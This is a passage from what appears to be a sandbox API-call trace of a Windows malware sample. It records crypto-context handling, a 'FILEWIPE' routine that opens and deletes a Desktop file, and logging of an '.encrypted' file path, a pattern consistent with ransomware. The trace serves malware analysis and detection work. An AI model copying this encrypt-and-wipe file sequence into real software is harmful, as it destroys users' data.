0x13 [0030.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.297] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.297] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0030.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.297] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.297] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0030.297] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0030.297] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0030.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0030.297] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.297] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0030.297] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.297] FreeLibrary (hLibModule=0x754b0000) returned 1 [0030.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0030.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0030.299] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0030.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0030.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.300] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4c6800, ftCreationTime.dwHighDateTime=0x1d5c2be, ftLastAccessTime.dwLowDateTime=0x43841660, ftLastAccessTime.dwHighDateTime=0x1d5c516, ftLastWriteTime.dwLowDateTime=0x43841660, ftLastWriteTime.dwHighDateTime=0x1d5c516, nFileSizeHigh=0x0, nFileSizeLow=0x2639, dwReserved0=0x0, dwReserved1=0x777648, cFileName="ORvAJyb.ots", cAlternateFileName="")) returned 0x7c2240 [0030.300] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0030.300] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.300] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.300] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0030.300] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.300] CharLowerBuffW (in: lpsz="byte[9785]", cchLength=0xa | out: lpsz="byte[9785]") returned 0xa [0030.300] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0030.300] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.300] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.300] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0030.300] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0030.300] FreeLibrary (hLibModule=0x76b40000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.301] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0030.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.302] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0030.302] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.302] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\orvajyb.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0030.302] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.302] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0030.302] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0030.302] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.302] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.302] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.302] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0030.303] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.303] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.303] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.303] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots", lpFilePart=0x0) returned 0x31 [0030.303] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4c6800, ftCreationTime.dwHighDateTime=0x1d5c2be, ftLastAccessTime.dwLowDateTime=0x43841660, ftLastAccessTime.dwHighDateTime=0x1d5c516, ftLastWriteTime.dwLowDateTime=0x11f34e40, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x2639, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="ORvAJyb.ots", cAlternateFileName="")) returned 0x7c2240 [0030.303] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\orvajyb.ots")) returned 1 [0030.304] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4c6800, ftCreationTime.dwHighDateTime=0x1d5c2be, ftLastAccessTime.dwLowDateTime=0x43841660, ftLastAccessTime.dwHighDateTime=0x1d5c516, ftLastWriteTime.dwLowDateTime=0x11f34e40, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x2639, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="ORvAJyb.ots", cAlternateFileName="")) returned 0 [0030.305] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0030.305] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.305] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0030.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0030.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0030.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0030.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0030.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0030.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0030.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0030.305] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.305] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0030.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ots", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ots", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.305] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0030.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.305] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0030.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0030.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.306] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0030.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0030.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0030.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.306] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0030.306] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.306] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.306] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0030.306] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.306] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0030.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0030.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.306] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0030.306] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x32c, lpOverlapped=0x0) returned 1 [0030.307] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0030.307] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x32c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.307] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0030.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0030.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0030.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.encrypted.ots\r\n", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0030.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3e) returned 0x7ab380 [0030.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.encrypted.ots\r\n", cchWideChar=62, lpMultiByteStr=0x7ab380, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.encrypted.ots\r\n", lpUsedDefaultChar=0x0) returned 62 [0030.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0030.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0030.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.307] WriteFile (in: hFile=0x128, lpBuffer=0x7ab338*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7ab338*, lpNumberOfBytesWritten=0x6aee3c*=0x3d, lpOverlapped=0x0) returned 1 [0030.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0030.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.308] CloseHandle (hObject=0x128) returned 1 [0030.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0030.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0030.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0030.309] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0030.309] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0030.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0030.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0030.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0030.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.310] HeapFree (in: 